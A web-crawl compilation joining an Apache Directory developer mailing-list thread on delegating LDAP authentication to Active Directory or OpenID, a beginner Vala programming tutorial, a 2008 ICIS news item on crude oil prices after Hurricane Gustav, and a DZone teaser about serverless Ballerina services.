>> > recreating entries for all users in AD for example.
>> > Multiple External Authentication Mechanisms
>> > ----------------------------------------------------------------
>> > Now you might not just be delegating to AD but to for example OpenID. So
>> > it
>> > would be nice to be able to allow for any kind of delegated
>> > authentication
>> > to occur. The delegation machinery leveraging the administration model
>> > for
>> > selection can be generic yet the subentries that map the selection to an
>> > external authentication mechanism can use pluggable mechanisms like AD
>> > or
>> > OpenID. Even PAM like behavior can be enabled in a stack.
>> >
>> > LDAP Principle to External Mechanism Mapping
>> > --------------------------------------------------------------------
>> > Whether or not the bind principal exists inside ApacheDS or not, we may
>> > have
>> > to transform or rather map that principal into the namespace of the
>> > external
>> > authentication mechanism. The way this is done will be mechanism
>> > dependent
>> > obviously.
>> > If prescriptive delegation occurs leveraging the administrative model
>> > then
>> > it's possible to have 1:1 mapping between ApacheDS principals to
>> > ActiveDirectory principals without the need to have mirrored entries in
>> > ApacheDS for ActiveDirectory users.
>> > If prescriptive delegation is not used and AD users are mirrored in
>> > ApacheDS
>> > with a 1:1 mapping of distinguishedNames then there's no need for
>> > mapping.
>> > Users will have to set out to design their DIT in this manner to reflect
>> > their AD layout of users. This might be tedious and cause other
>> > problems.
>> > Anyways without the 1:1 mapping even when the external authentication
>> > mechanism is another LDAP server like AD, we're going to have to manage
>> > principle name transformations/mappings.
>> > Just wanted to transfer these thoughts to the group but please don't
>> > presume
>> > I am expecting these approaches to be implemented in the first
>> > incarnation
>> > or at all even. This is knowledge gathered over years from enterprise
>> > user
>> > feedback and we should have them at least in mind.
>> >>
>> >> I'm pretty sure it's not such a big deal, but we need time, and we have
>> >> littel :) I would suggest we follow closely Antoine's effort and try to
>> >> leverage what he is doing to improve the server *and* the
>> >> documentation...
>> >>
>> >
>> > +1
>> > --
>> > Alex Karasulu
>> > My Blog ::
>> > Apache Directory Server ::
>> > Apache MINA ::
>> > To set up a meeting with me:
>> >
>>
>>
>>
>> --
>> Kiran Ayyagari
>
>
>
> --
> Alex Karasulu
> My Blog ::
> Apache Directory Server ::
> Apache MINA ::
> To set up a meeting with me:
>
--
Kiran Ayyagari
|
http://mail-archives.apache.org/mod_mbox/directory-dev/201011.mbox/%3CAANLkTi=8Xt0PS2BJiKCkV4c2G2tj0h4=MGTorfwobtt7@mail.gmail.com%3E
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
after about 8 years of C and bourne, i finally decided to learn a descent language. and by learn, i mean learn from the beginning, as a baby. making things clean, trying to forget crappy things i made in the past. So, i decided to choose vala for testing my fresh baby brain. This first post on vala is be the beginning of a step by step introduction to this language for people who know C or C++.
first, read This Hello World in Vala
Here is a variant, which goal is to demonstrate how to use program's arguments, and how to get an array's length:
using GLib;
public class Tutorial.CommandLineArgs : GLib.Object {
public static void main(string[] args) {
for (uint i=1; i< args.length; i++)
stdout.printf("Hello, %s. ",args[i]);
stdout.printf("My name is %s\n", args[0]);
}
}
Here you see the declaration of an array of strings which i called args, another declaration: an unsigned integer variable named i. Then you see the length member of the array type. Finally you see how to acces to an array's cell.
Question from the baby: how to get the real basename of args[0], having knowledge of basename() from <libgen.h> or g_path_get_basename() from GLib ? Reply: to acces g_path_get_basename() from GLib, Vala has this naming convetion: GLib.Path.get_basename(). Now it's up to you to make a better hello people program.
|
http://www.advogato.org/person/groom/diary.html?start=49
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
02 September 2008 10:23 [Source: ICIS news]
LONDON (ICIS news)--NYMEX light sweet crude futures plummeted by almost $10.00/bbl on Tuesday to take the front month October contract close to $105.50/bbl after reports Hurricane Gustav had caused minimal damage to oil facilities in the US Gulf.
?xml:namespace>
By 09:16 GMT, October NYMEX crude had hit a low of $105.53/bbl, a loss of $9.93/bbl from Monday’s close of $116.65/bbl, before recovering to around $107.16/bbl.
At the same time, October Brent crude on ?xml:namespace>
The US National Hurricane Center downgraded Gustav to a category one storm as it made landfall near Port Fourchon,
Maximum sustained wind speeds have decreased to 45 miles/hour (75 km/hour), from earlier reported speeds of 115 miles/hour with continued weakening forecast, the centre said, adding Gustav was expected to become a tropical depression later on Tuesday.
|
http://www.icis.com/Articles/2008/09/02/9153259/us-crude-plummets-10bbl-as-gustav-passes.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
In this tutorial, we will go over several ways that you can use to subset a dataframe. If you are importing data into Python then you must be aware of Data Frames. A DataFrame is a two-dimensional data structure, i.e., data is aligned in a tabular fashion in rows and columns.
Subsetting a data frame is the process of selecting a set of desired rows and columns from the data frame.
You can select:
- all rows and limited columns
- all columns and limited rows
- limited rows and limited columns.
Subsetting a data frame is important as it allows you to access only a certain part of the data frame. This comes in handy when you want to reduce the number of parameters in your data frame.
Let’s start with importing a dataset to work on.
Importing the Data to Build the Dataframe
In this tutorial we are using the California Housing dataset.
Let’s start with importing the data into a data frame using pandas.
import pandas as pd housing = pd.read_csv("/sample_data/california_housing.csv") housing.head()
Our csv file is now stored in housing variable as a Pandas data frame.
Select a Subset of a Dataframe using the Indexing Operator
Indexing Operator is just a fancy name for square brackets. You can select columns, rows, and a combination of rows and columns using just the square brackets. Let’s see this in action.
1. Selecting Only Columns
To select a column using indexing operator use the following line of code.
housing['population']
This line of code selects the column with label as ‘population’ and displays all row values corresponding to that.
You can also select multiple columns using indexing operator.
housing[['population', 'households' ]]
To subset a dataframe and store it, use the following line of code :
housing_subset = housing[['population', 'households' ]] housing_subset.head()
This creates a separate data frame as a subset of the original one.
2. Selecting Rows
You can use the indexing operator to select specific rows based on certain conditions.
For example to select rows having population greater than 500 you can use the following line of code.
population_500 = housing[housing['population']>500] population_500
You can also further subset a data frame. For example, let’s try and filter rows from our housing_subset data frame that we created above.
population_500 = housing_subset[housing['population']>500] population_500
Note that the two outputs above have the same number of rows (which they should).
Subset a Dataframe using Python .loc()
.loc indexer is an effective way to select rows and columns from the data frame. It can also be used to select rows and columns simultaneously.
An important thing to remember is that .loc() works on the labels of rows and columns. After this, we will look at .iloc() that is based on an index of rows and columns.
1. Selecting Rows with loc()
To select a single row using .loc() use the following line of code.
housing.loc[1]
To select multiple rows use :
housing.loc[[1,5,7]]
You can also slice the rows between a starting index and ending index.
housing.loc[1:7]
2. Selecting rows and columns
To select specific rows and specific columns out of the data frame, use the following line of code :
housing.loc[1:7,['population', 'households']]
This line of code selects rows from 1 to 7 and columns corresponding to the labels ‘population’ and ‘housing’.
Subset a Dataframe using Python iloc()
iloc() function is short for integer location. It works entirely on integer indexing for both rows and columns.
To select a subset of rows and columns using iloc() use the following line of code:
housing.iloc[[2,3,6], [3, 5]]
This line of code selects row number 2, 3 and 6 along with column number 3 and 5.
Using iloc saves you from writing the complete labels of rows and columns.
You can also use iloc() to select rows or columns individually just like loc() after replacing the labels with integers.
Conclusion
This tutorial was about subsetting a data frame in python using square brackets, loc and iloc. We learnt how to import a dataset into a data frame and then how to filter rows and columns from the data frame.
|
https://www.askpython.com/python/examples/subset-a-dataframe
|
CC-MAIN-2021-31
|
en
|
refinedweb
|
We can refresh a webpage using Selenium webdriver in Python. This can be done with the help of the refresh method. First of all, we have to launch the application with the get method.
Once a web page is loaded completely, we can then refresh the page with the help of the refresh method. This way the existing page gets refreshed. The refresh method is to be applied on the webdriver object.
driver.get("") driver.refresh()
from selenium import webdriver #set chromodriver.exe path driver = webdriver.Chrome(executable_path="C:\\chromedriver.exe") driver.implicitly_wait(0.5) #launch URL driver.get("") #identify text box m = driver.find_element_by_class_name("gLFyf") #send input m.send_keys("Java") #refresh page driver.refresh()
|
https://www.tutorialspoint.com/how-to-refresh-a-webpage-using-python-selenium-webdriver
|
CC-MAIN-2021-31
|
en
|
refinedweb
|
CURLOPT_PROXYUSERPWD explained
NAME
CURLOPT_PROXYUSERPWD - user name and password to use for proxy authentication
SYNOPSIS
#include <curl/curl.h>
CURLcode curl_easy_setopt(CURL *handle, CURLOPT_PROXYUSERPWD, char *userpwd);
DESCRIPTION is used - beware.)
Use CURLOPT_PROXYAUTH to specify the authentication method.
The application does not have to keep the string around after setting this option.
DEFAULT
PROTOCOLS
Used with all protocols that can use a proxy
EXAMPLE
RETURN VALUE
Returns CURLE_OK if proxies are supported, CURLE_UNKNOWN_OPTION if not, or CURLE_OUT_OF_MEMORY if there was insufficient heap space.
SEE ALSO
CURLOPT_PROXY, CURLOPT_PROXYTYPE
This HTML page was made with roffit.
|
https://curl.haxx.se/libcurl/c/CURLOPT_PROXYUSERPWD.html
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
SystemParametersInfoA function
Retrieves or sets the value of one of the system-wide parameters. This function can also update the user profile while setting a parameter.
Syntax
BOOL SystemParametersInfoA( UINT uiAction, UINT uiParam, PVOID pvParam, UINT fWinIni );
Parameters
uiAction
Type: UINT
The system-wide parameter to be retrieved or set. The possible values are organized in the following tables of related parameters:
<ul>
The following are the accessibility parameters.
The following are the desktop parameters.
The following are the icon parameters.
The following are the input parameters. They include parameters related to the keyboard, mouse, pen, input language, and the warning beeper.
The following are the menu parameters.
The following are the power parameters.
Beginning with Windows Server 2008 and Windows Vista, these power parameters are not supported. Instead, to determine the current display power state, an application should register for GUID_MONITOR_POWER_STATE notifications. To determine the current display power down time-out, an application should register for notification of changes to the GUID_VIDEO_POWERDOWN_TIMEOUT power setting. For more information, see Registering for Power Events.
Windows Server 2003 and Windows XP/2000: To determine the current display power state, use the following power parameters.
The following are the screen saver parameters.
The following are the time-out parameters for applications and services.
The following are the UI effects. The SPI_SETUIEFFECTS value is used to enable or disable all UI effects at once. This table contains the complete list of UI effect values.
The following are the window parameters.
uiParam
Type: UINT
A parameter whose usage and format depends on the system parameter being queried or set. For more information about system-wide parameters, see the uiAction parameter. If not otherwise indicated, you must specify zero for this parameter.
pvParam
Type: PVOID
A parameter whose usage and format depends on the system parameter being queried or set. For more information about system-wide parameters, see the uiAction parameter. If not otherwise indicated, you must specify NULL for this parameter. For information on the PVOID datatype, see Windows Data Types.
fWinIni
Type: UINT
If a system parameter is being set, specifies whether the user profile is to be updated, and if so, whether the WM_SETTINGCHANGE message is to be broadcast to all top-level windows to notify them of the change.
This parameter can be zero if you do not want to update the user profile or broadcast the WM_SETTINGCHANGE message, or it can be one or more of the following values.
Return Value
Type: Type: BOOL
If the function succeeds, the return value is a nonzero value.
If the function fails, the return value is zero. To get extended error information, call GetLastError.
Remarks
This function is intended for use with applications that allow the user to customize the environment.
A keyboard layout name should be derived from the hexadecimal value of the language identifier corresponding to the layout.. For a list of the primary language identifiers and sublanguage identifiers that make up a language identifier, see the MAKELANGID macro.
There is a difference between the High Contrast color scheme and the High Contrast Mode. The High Contrast color scheme changes the system colors to colors that have obvious contrast; you switch to this color scheme by using the Display Options in the control panel. The High Contrast Mode, which uses SPI_GETHIGHCONTRAST and SPI_SETHIGHCONTRAST, advises applications to modify their appearance for visually-impaired users. It involves such things as audible warning to users and customized color scheme (using the Accessibility Options in the control panel). For more information, see HIGHCONTRAST. For more information on general accessibility features, see Accessibility.
During the time that the primary button is held down to activate the Mouse ClickLock feature, the user can move the mouse. After the primary button is locked down, releasing the primary button does not result in a WM_LBUTTONUP message. Thus, it will appear to an application that the primary button is still down. Any subsequent button message releases the primary button, sending a WM_LBUTTONUP message to the application, thus the button can be unlocked programmatically or through the user clicking any button.
This API is not DPI aware, and should not be used if the calling thread is per-monitor DPI aware. For the DPI-aware version of this API, see SystemParametersInfoForDPI. For more information on DPI awareness, see the Windows High DPI documentation.
Examples
The following example uses SystemParametersInfo to double the mouse speed.
#include <windows.h> #include <stdio.h> #pragma comment(lib, "user32.lib") void main() { BOOL fResult; int aMouseInfo[3]; // Array for mouse information // Get the current mouse speed. fResult = SystemParametersInfo(SPI_GETMOUSE, // Get mouse information 0, // Not used &aMouseInfo, // Holds mouse information 0); // Not used // Double it. if( fResult ) { aMouseInfo[2] = 2 * aMouseInfo[2]; // Change the mouse speed to the new value. SystemParametersInfo(SPI_SETMOUSE, // Set mouse information 0, // Not used aMouseInfo, // Mouse information SPIF_SENDCHANGE); // Update Win.ini } }
Requirements
See Also
SystemParametersInfoForDPI
|
https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-systemparametersinfoa
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
Heap Sort:
Heap sort is a comparison based sorting technique based on Binary Heap data structure. It is similar to selection sort where we first find the maximum element and place the maximum element at the end. We repeat the same process for remaining element.
Binary Heap:
Let us first define a Complete Binary Tree. A complete binary tree is a binary tree in which every level, except possibly the last, is completely filled, and all nodes are as far left as possible..
You make like.
Program to implement Heap Sort in C++
#include <iostream> using namespace std; void max_heapify(int *a, int i, int n) { int j, temp; temp = a[i]; j = 2*i; while (j <= n) { if (j < n && a[j+1] > a[j]) j = j+1; if (temp > a[j]) break; else if (temp <= a[j]) { a[j/2] = a[j]; j = 2*j; } } a[j/2] = temp; return; } void heapsort(int *a, int n) { int i, temp; for (i = n; i >= 2; i--) { temp = a[i]; a[i] = a[1]; a[1] = temp; max_heapify(a, 1, i - 1); } } void build_maxheap(int *a, int n) { int i; for(i = n/2; i >= 1; i--) { max_heapify(a, i, n); } } int main() { int n, i, x; cout<<"Enter no of elements of array\n"; cin>>n; int a[20]; for (i = 1; i <= n; i++) { cout<<"Enter element"<<(i)<<endl; cin>>a[i]; } build_maxheap(a,n); heapsort(a, n); cout<<"\n\nSorted Array\n"; for (i = 1; i <= n; i++) { cout<<a[i]<<endl; } return 0; }
Sample Output:
Enter no of elements of array 5 Enter element1 3 Enter element2 8 Enter element3 9 Enter element4 3 Enter element5 2 Sorted Array 2 3 3 8 9
|
https://proprogramming.org/heap-sort-in-c/
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
Talk:Date specification
- if there are real ambiguities in the previous version of the document please point out which precisely
- fixed numbers of digits etc can't be enforced. If you don't know on which day of 1761 a road was opened it would be wrong to enter a fake day/month just to simplify parsing. Hence relying on this will only lead to greater ambiguity and filtering/searching tags will work worse.
- while parsing of the original format may appear complex its is only a slight variation of the standard which is fairly widely implemented, the programmers point view in a very similar case has been also discussed here: Talk:Proposed_features/Date_namespace#It_is_awful_from_the_point_of_view_of_querying_and_data_processing
RicoZ (talk) 16:03, 19 April 2017 (UTC)
- PArsing ambiguities is all about this. But the double-hyphen is not required and almost never used anywhere. Most tags never use them for date range, because they are not needed for correct parsing.
- The format of individual dates should still honor the ISO format, with 4-digit years, and 2-digits months and days of month. Hever you really looked at the data and how dates are really parsed and entered in the database?
- It is just enough to signal cases where ambiguities occur, but with the ISO format enforced (with required hyphen separators between elements), we can easily determine where there's a date range or not: the double hyphen is never needed if 4-digit years are present (and this is almost always the case in most tags). As well requiring hyphens between date elements (ISO format) means that "1761" is unambiguously a year, not a fake month and a 2 year: all date elements have a fixed number of digits (2 or 4).
- Beside this there's another (more complex) specification for opening_hours that allows specifying dates partially, with repetitions or other conditions. — Verdy_p (talk) 20:05, 19 April 2017 (UTC)
- Pardon? I have parsing ambiguities with your text. Can you just answer my concerns point by point? And no, this wikipage has been in place for just too long so you can not replace it with something diametraly opposing without prior discussion. RicoZ (talk) 22:36, 19 April 2017 (UTC)
- But your text contradicts many existing uses in the database. No there's not any ambiguity. You've introduced requirements that did not exist, by not looking at existing data (since longer time than your text).
- You've been strictly alone to put that text in 2014, without ever discussing it and without checking what was in the database long before. It has been rapoidly corrected to include the current practices, and you've made compeltely false assumptions about the ISO 8601 format and your supposed "backward compatibility". the "--" has never been recommended anywhere by anyone except you. The correction has been rapidly made when you linked your page to other pages because it was wrong (and also incoimpatible with the adopted schemd for opening_hours where this was discussed and where "-" is used consistently.
- Your reverts are like if you want to ignore all current best practices. You made errors but cannot admit it.
- I've not removed your proposal to use "--", but it is definitely not needed at all :
- it's not compatible with ISO 8601 (unlike what you wrote, which is false)
- it is not backward compatible (unlike what you wrote, which is false)
- it has never been discussed and approved (unlike what you wrote, which is false)
- it is not the common practice (unlike what you wrote, which is false)
- it is not even needed for standard date ranges (with years)
- and for monthly and yearly recurrent date (the only case where "--" is usable) it is NOT what was adopted and discussed with the opening hours (that uses "-" only, but makes distinctions using 3-letter abbreviated month names instead of month number)
- For this reason I do think that even you proposal should be rejected. Only "-" should be kept and only for date ranges with years (and NO: this does not create any ambiguity), the other cases (with missing years) being trated with opening_hours prefered to your "--" proposal (incorrectly justified).
- And visibly you don't know what the ISO 8901 standard says about validity of formats.
- What are parsing problems? You spoke about "1761" alone but there's no ambiguity at all, it is only a year. Give only one example! You can't. Your 2014 text was invalid (and not discussed at all otherwise you would have seen the problem that it was not working like this in MANY existing data).
- Summary: you did not perform any search, you just wanted to document some specific cases you have used locally in your region of interest or for some tags).
- I did not invalidate your personal (undiscussed) "--" proposal for date ranges, but added what was already used (with a single "-" almost everywhere). And I made sure that the ISO 8601 format was respected ("80-1-1" is NOT a valid ISO date format, "1980-01-01" is valid and works with simpler parsers)
- — Verdy_p (talk) 23:35, 19 April 2017 (UTC)
- If you had read the ISO 8601 standard correctly, "--" was already used in an older version for dates with missing years (this feature has been removed: ISO formats must start by a 4-digit year, possibly prefixed by a sign by years in BCE and there's no "0000"). Date intervals in ISO 8601 use a slash "/" instead... Your "--" is an invention by you only, not used by anyone else. — Verdy_p (talk) 23:50, 19 April 2017 (UTC)
- Sure it has been a while ago that I wrote this text. It has not been questioned until you came so there was no discussion. There is at least one existing implementation (independent of me) which proves that it works. Have you tried to implement your idea? You are making it more complicated to implement, it is more verbose, it is more error prone - why?? Just to avoid the use of "--" in some cases? I see you made some improvements of your idea however there still many things which at this point are unclear to me or dubious. Did I anywhere claim that "80-1-1" was a valid date? If you have this impression I don't object to claryfing that this is indeed not a valid date. However 1980-1-1 is a valid date. Also, in your latest version ( [2] ) you contradict your own claim (above) that a double hyphen is not needed at all.
- This page was never meant to replace or compete with the opening hours date specification, they are for different purposes.
- Looking again at the state of ISO8601 and related standards I notice that many things changed since I wrote this proposal so it is a good idea to look at it again.
- At this point we should make a step back and regard your and mine variants as proposals. So please restore my original proposal, create your proposal and move both to the proposal space. Then we can both work on our proposals and probably agree on something. RicoZ (talk) 21:05, 21 April 2017 (UTC)
- It is not "my idea" but the most common practice currently in OSM. Only you seem to support the "--" which is not compatible with ISO 8601 and causes ambiguities.
- Yes the "-" separator is used since very long (long before your undiscussed proposal you wrote in mid-2014 without checking).
- And franky I don't understand why you think your idea is simpler when in fact it was inconsistant, and also incompatible with the openin_hours (that has been discussed a lot and also using "-" with the promiss to be also compatible with simple date ranges writting with "-", not with "--" that you are alone to support and which is used by almost no one (except those that have read your page during a short period after you linked it to other pages.
- But I've not removed your proposal, I just iunk it is not even needed at all. "--" for date ranges has never been part of any standard. But many applications and users expect a single "-" (or an en-dash=half-cadratin hyphen, not an em-dash=cadratin hyphen)
- Note also that "1980-1-1 is NOT valid in ISO8601. Standard dsate ranges MUST start by a year any way and that year must be written with 4 digits. This means that the "-" separator coming in a date range can only come before 4 digits for the year (or occurs at start or end for open-ended ranges, that are also not ambiguous at all). There's never any ambiguity for standard date ranges.
- But I only note that it could have been needed for recurennt monthly or year data ranges ommiting years, but another solution was adopted for recurrent dates, i.e. the opening_hours specification, where months in this case are using 3-letters, not digits and where recurrent ranges of days in one month are also written as two digits (avoiding all confusion of these days with years that must have 4 digits).
- All practives adopted require the fixed number of digits (2 for months and days, 4 digits for years).
- When you reverted my old edit, you have wanted to erase a practice that was used since longer tyhan your proposal, as if it did not exist, even if it was already used massively and caused absolutely no interpretation problem for anyone. Once again it was not "my idea" but an idea already used by many people and already widely understood.
- The only alternative I've seen in some tags is to add extra spaces around "-" in date ranges, but only for typographical purpose (in that case the "-" should also become a typographic en-dash, including in opening_hours; this is not needed: a typographic representation would depend on the language used, and would also reformat the dates in national formats as well instead of IOS8601 format, possibly with non ASCII digits in Arabic, Farsi, Chinese, Japanese...). For this reason even these spaces are not needed: a renderer that would display those dates for a language/typographic convention would rewrite the value completely, but we won't do that in OSM tags where they are meant to be used for technical use, and hould have a form easily parsable without unneeded variants: the simplest and most efficient parsers will prefer keeping only the strict ISO format for dates, and don't need extra characters such as a second "-" which may cause unmodified ISO8601 parsers to break. — Verdy_p (talk) 01:21, 22 April 2017 (UTC)
|
https://wiki.openstreetmap.org/wiki/Talk:Date_specification
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
What's new for Visual Basic
This topic lists key feature names for each version of Visual Basic, with detailed descriptions of the new and enhanced features in the latest versions of the language.
Current version
Visual Basic 15.5 / Visual Studio 2017 Version 15.5
For new features, see Visual Basic 15.5
Previous versions
Visual Basic 15.3 / Visual Studio 2017 Version 15.3
For new features, see Visual Basic 15.3
Visual Basic 2017 / Visual Studio 2017
For new features, see Visual Basic 2017
Visual Basic / Visual Studio 2015
For new features, see Visual Basic 14
Visual Basic / Visual Studio 2013
Technology previews of the .NET Compiler Platform (“Roslyn”)
Visual Basic / Visual Studio 2012
Async and
await keywords, iterators, caller info attributes
Visual Basic, Visual Studio 2010
Auto-implemented properties, collection initializers, implicit line continuation, dynamic, generic co/contra variance, global namespace access
Visual Basic / Visual Studio 2008
Language Integrated Query (LINQ), XML literals, local type inference, object initializers, anonymous types, extension methods, local
var type inference, lambda expressions,
if operator, partial methods, nullable value types
Visual Basic / Visual Studio 2005
The
My type and helper types (access to app, computer, files system, network)
Visual Basic / Visual Studio .NET 2003
Bit-shift operators, loop variable declaration
Visual Basic / Visual Studio .NET 2002
The first release of Visual Basic .NET
Visual Basic 15.5
Non-trailing named arguments
In Visual Basic 15.3 and earlier versions, when a method call included arguments both by position and by name, positional arguments had to precede named arguments. Starting with Visual Basic 15.5, positional and named arguments can appear in any order as long as all arguments up to the last positional argument are in the correct position. This is particularly useful when named arguments are used to make code more readable.
For example, the following method call has two positional arguments between a named argument. The named argument makes it clear that the value 19 represents an age.
StudentInfo.Display("Mary", age:=19, #9/21/1998#)
Private Protected member access modifier
This new keyword combination defines a member that is accessible by all members in its containing class as well as by types derived from the containing class, but only if they are also found in the containing assembly. Because structures cannot be inherited,
Private Protected can only be applied to the members of a class.
Leading hex/binary/octal separator
Visual Basic 2017 added support for the underscore character (
_) as a digit separator. Starting with Visual Basic 15.5, you can use the underscore character as a leading separator between the prefix and hexadecimal, binary, or octal digits. The following example uses a leading digit separator to define 3,271,948,384 as a hexadecimal number:
Dim number As Integer = &H_C305_F860
To use the underscore character as a leading separator, you must add the following element to your Visual Basic project (*.vbproj) file:
<PropertyGroup> <LangVersion>15.5</LangVersion> </PropertyGroup>
Visual Basic 15.3
When you assign the value of tuple elements from variables, Visual Basic infers the name of tuple elements from the corresponding variable names; you do not have to explicitly name a tuple element. The following example uses inference to create a tuple with three named elements,
state,
stateName, and
capital.
Dim state = "MI" Dim stateName = "Michigan" Dim capital = "Lansing" Dim stateInfo = ( state, stateName, capital ) Console.WriteLine($"{stateInfo.stateName}: 2-letter code: {stateInfo.State}, Capital {stateInfo.capital}") ' The example displays the following output: ' Michigan: 2-letter code: MI, Capital Lansing
Additional compiler switches
The Visual Basic command-line compiler now supports the -refout and -refonly compiler options to control the output of reference assemblies. -refout defines the output directory of the reference assembly, and -refonly specifies that only a reference assembly is to be output by compilation.
Visual Basic 2017
Tuples are a lightweight data structure that most commonly is used to return multiple values from a single method call. Ordinarily, to return multiple values from a method, you have to do one of the following:
Define a custom type (a
Classor a
Structure). This is a heavyweight solution.
Define one or more
ByRefparameters, in addition to returning a value from the method.
Visual Basic's support for tuples lets you quickly define a tuple, optionally assign semantic names to its values, and quickly retrieve its values. The following example wraps a call to the TryParse method and returns a tuple.
Imports System.Globalization Public Module NumericLibrary Public Function ParseInteger(value As String) As (Success As Boolean, Number As Int32) Dim number As Integer Return (Int32.TryParse(value, NumberStyles.Any, CultureInfo.InvariantCulture, number), number) End Function End Module
You can then call the method and handle the returned tuple with code like the following.
Dim numericString As String = "123,456" Dim result = ParseInteger(numericString) Console.WriteLine($"{If(result.Success, $"Success: {result.Number:N0}", "Failure")}") Console.ReadLine() ' Output: Success: 123,456
Binary literals and digit separators
You can define a binary literal by using the prefix
&B or
&b. In addition, you can use the underscore character,
_, as a digit separator to enhance readability. The following example uses both features to assign a
Byte value and to display it as a decimal, hexadecimal, and binary number.
Dim value As Byte = &B0110_1110 Console.WriteLine($"{NameOf(value)} = {value} (hex: 0x{value:X2}) " + $"(binary: {Convert.ToString(value, 2)})") ' The example displays the following output: ' value = 110 (hex: 0x6E) (binary: 1101110)
For more information, see the "Literal assignments" section of the Byte, Integer, Long, Short, SByte, UInteger, ULong, and UShort data types.
Support for C# reference return values
Starting with C# 7.0, C# supports reference return values. That is, when the calling method receives a value returned by reference, it can change the value of the reference. Visual Basic does not allow you to author methods with reference return values, but it does allow you to consume and modify the reference return values.
For example, the following
Sentence class written in C# includes a
FindNext method that finds the next word in a sentence that begins with a specified substring. The string is returned as a reference return value, and a
Boolean variable passed by reference to the method indicates whether the search was successful. This means that the caller can not only read the returned value; he or she can also modify it, and that modification is reflected in the
Sentence class.
using System; public class Sentence { private string[] words; private int currentSearchPointer; public Sentence(string sentence) { words = sentence.Split(' '); currentSearchPointer = -1; } public ref string FindNext(string startWithString, ref bool found) { for (int count = currentSearchPointer + 1; count < words.Length; count++) { if (words[count].StartsWith(startWithString)) { currentSearchPointer = count; found = true; return ref words[currentSearchPointer]; } } currentSearchPointer = -1; found = false; return ref words[0]; } public string GetSentence() { string stringToReturn = null; foreach (var word in words) stringToReturn += $"{word} "; return stringToReturn.Trim(); } }
In its simplest form, you can modify the word found in the sentence by using code like the following. Note that you are not assigning a value to the method, but rather to the expression that the method returns, which is the reference return value.
Dim sentence As New Sentence("A time to see the world is now.") Dim found = False sentence.FindNext("A", found) = "A good" Console.WriteLine(sentence.GetSentence()) ' The example displays the following output: ' A good time to see the world is now.
A problem with this code, though, is that if a match is not found, the method returns the first word. Since the example does not examine the value of the
Boolean argument to determine whether a match is found, it modifies the first word if there is no match. The following example corrects this by replacing the first word with itself if there is no match.
Dim sentence As New Sentence("A time to see the world is now.") Dim found = False sentence.FindNext("A", found) = IIf(found, "A good", sentence.FindNext("B", found)) Console.WriteLine(sentence.GetSentence()) ' The example displays the following output: ' A good time to see the world is now.
A better solution is to use a helper method to which the reference return value is passed by reference. The helper method can then modify the argument passed to it by reference. The following example does that.
Module Example Public Sub Main() Dim sentence As New Sentence("A time to see the world is now.") Dim found = False Dim returns = RefHelper(sentence.FindNext("A", found), "A good", found) Console.WriteLine(sentence.GetSentence()) End Sub Private Function RefHelper(ByRef stringFound As String, replacement As String, success As Boolean) _ As (originalString As String, found As Boolean) Dim originalString = stringFound If found Then stringFound = replacement Return (originalString, found) End Function End Module ' The example displays the following output: ' A good time to see the world is now.
For more information, see Reference Return Values.
Visual Basic 14
You can use string interpolation expressions to construct strings. An interpolated string expression looks like a template string that contains expressions. An interpolated string is easier to understand with respect to arguments than Composite Formatting.
Null-conditional member access and indexing
You.
Multi-line string literals
String literals can contain newline sequences. You no longer need the old work around of using
<xml><![CDATA[...text with newlines...]]></xml>.Value
You can put comments after implicit line continuations, inside initializer expressions, and among LINQ expression terms.
Smarter fully-qualified name resolution
Given code such as
Threading.Thread.Sleep(1000), Visual Basic used to look up the namespace "Threading", discover it was ambiguous between System.Threading and System.Windows.Threading, and then report an error. Visual Basic now considers both possible namespaces together. If you show the completion list, the Visual Studio editor lists members from both types in the completion list.
Year-first date literals
You can have date literals in yyyy-mm-dd format,
#2015-03-17 16:10 PM#.
Readonly interface properties
You can implement readonly interface properties using a readwrite property. The interface guarantees minimum functionality, and it does not stop an implementing class from allowing the property to be set.
TypeOf <expr> IsNot <type>
For more readability of your code, you can now use
TypeOf with
IsNot.
#Disable Warning <ID> and #Enable Warning <ID>
You can disable and enable specific warnings for regions within a source file.
XML doc comment improvements
When writing doc comments, you get smart editor and build support for validating parameter names, proper handling of
crefs (generics, operators, etc.), colorizing, and refactoring.
Partial module and interface definitions
In addition to classes and structs, you can declare partial modules and interfaces.
#Region directives inside method bodies
You can put #Region…#End Region delimiters anywhere in a file, inside functions, and even spanning across function bodies.
Overrides definitions are implicitly overloads
If you add the
Overrides modifier to a definition, the compiler implicitly adds
Overloads so that you can type less code in common cases.
CObj allowed in attributes arguments
The compiler used to give an error that CObj(…) was not a constant when used in attribute constructions.
Declaring and consuming ambiguous methods from different interfaces
Previously the following code yielded errors that prevented you from declaring
IMock or from calling
GetDetails (if these had been declared in C#):
Interface ICustomer Sub GetDetails(x As Integer) End Interface Interface ITime Sub GetDetails(x As String) End Interface Interface IMock : Inherits ICustomer, ITime Overloads Sub GetDetails(x As Char) End Interface Interface IMock2 : Inherits ICustomer, ITime End Interface
Now the compiler will use normal overload resolution rules to choose the most appropriate
GetDetails to call, and you can declare interface relationships in Visual Basic like those shown in the sample.
See also
What's New in Visual Studio 2017
|
https://docs.microsoft.com/en-us/dotnet/visual-basic/getting-started/whats-new
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
i have to create a city application that prompts the user for a series of city names and then displays the number of city names entered and then the name of the city with the most characters in uppercase letters.
how come it always output the last name entered ?
import java.util.Scanner; public class Cities { public static void main(String[]args) { Scanner input = new Scanner(System.in); int maxLength = 0; int length = 0; int count = 0; String longName = ""; System.out.print("Enter a city name <stop to quit> :"); String name = input.nextLine(); while(!(name.equals("stop"))) { length = name.length(); if(length> maxLength) longName = name; System.out.print("Enter another city name <stop to quit> :"); name = input.next(); count++; } System.out.println(count + " were entered" ); System.out.println("The longest was : " + longName); }
|
https://www.daniweb.com/programming/software-development/threads/398821/string-problem
|
CC-MAIN-2018-43
|
en
|
refinedweb
|
Ballerina Services in Serverless World
Ballerina Services in Serverless World
Learn how to run Ballerina Services in a serverless capacity in conjunction with Amazon AWS.
Join the DZone community and get the full member experience.Join For Free
Insight into the right steps to take for migrating workloads to public cloud and successfully reducing cost as a result. Read the Guide.
